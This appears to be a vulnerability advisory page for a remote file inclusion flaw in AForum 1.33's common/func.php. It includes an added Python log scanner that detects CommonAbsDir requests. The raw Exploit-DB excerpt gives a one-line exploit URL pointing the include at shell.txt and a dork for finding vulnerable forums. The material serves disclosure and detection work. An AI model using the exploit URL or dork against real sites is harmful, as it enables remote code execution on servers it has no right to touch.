vendor: AForum
by: ThE TiGeR
N/A
CVSS
N/A
Remote file inclusion
CWE
Product Name: AForum
Affected Version From: 1.33
Affected Version To: 1.33
Patch Exists: NO
Platforms Tested: Unknown
2007

AForum 1.33 Remote file inclusion (Func.php)

AForum version 1.33 is vulnerable to remote file inclusion in the Func.php file. An attacker can exploit this vulnerability by supplying a malicious file (shell.txt in the published example) through the CommonAbsDir parameter in the URL. This allows the attacker to execute arbitrary code on the affected server.
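Because the request pattern is fixed (the CommonAbsDir parameter set on common/func.php), it can be searched for in web server access logs. The following is an added example, not code from AForum or from the original advisory; the combined log format, the sample lines, and the function name `find_inclusion_attempts` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines in combined log format (not from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2007:10:01:02 +0000] "GET /forum/common/func.php?CommonAbsDir=shell.txt? HTTP/1.1" 200 512
198.51.100.4 - - [10/May/2007:10:01:05 +0000] "GET /forum/index.php?board=2 HTTP/1.1" 200 8120
203.0.113.9 - - [10/May/2007:10:02:11 +0000] "GET /msg/common/Func.php?commonabsdir=http%3A%2F%2Ffiles.example%2Fshell.txt%3F HTTP/1.1" 200 0
198.51.100.4 - - [10/May/2007:10:03:40 +0000] "GET /forum/common/func.php HTTP/1.1" 200 0
"""

# client address, request target and status code from one log line
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
TARGET_SCRIPT = "/common/func.php"  # script named in the advisory
TARGET_PARAM = "commonabsdir"       # parameter named in the advisory


def find_inclusion_attempts(log_text):
    """Return one dict per request that sets CommonAbsDir on common/func.php."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        # Compare case-insensitively so requests with altered casing are still reported.
        if not url.path.lower().endswith(TARGET_SCRIPT):
            continue
        # parse_qsl percent-decodes values, so encoded paths are seen in clear form.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name.lower() == TARGET_PARAM:
                hits.append({
                    "client": client,
                    "value": value,
                    # A scheme in the value means the include path points off-host.
                    "remote": "://" in value,
                    "status": int(status),
                })
    return hits


if __name__ == "__main__":
    for hit in find_inclusion_attempts(SAMPLE_LOG):
        print(hit)
```

Only the query string is inspected, so a parameter sent in a POST body will not appear in standard access logs and needs request-body logging or a WAF rule to be seen.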

Mitigation:

Unknown

Exploit-DB raw data:

#AForum =>1.33 Remote file inclusion (Func.php)

#Download Script : http://www.agner.org/software/msgbrd2/aforum.zip

#Thanks Str0ke

#D0rk:allintitle:List of messageboards

#Exploit :

#http://localhost/[aforum_path]/common/func.php?CommonAbsDir=shell.txt?

#Discovered By : ThE TiGeR

#Greetz : Reda, ™~${{BraveHeart}}$~™

#Miro_Tiger100[at]Hotmail[dot]com

# milw0rm.com [2007-05-09]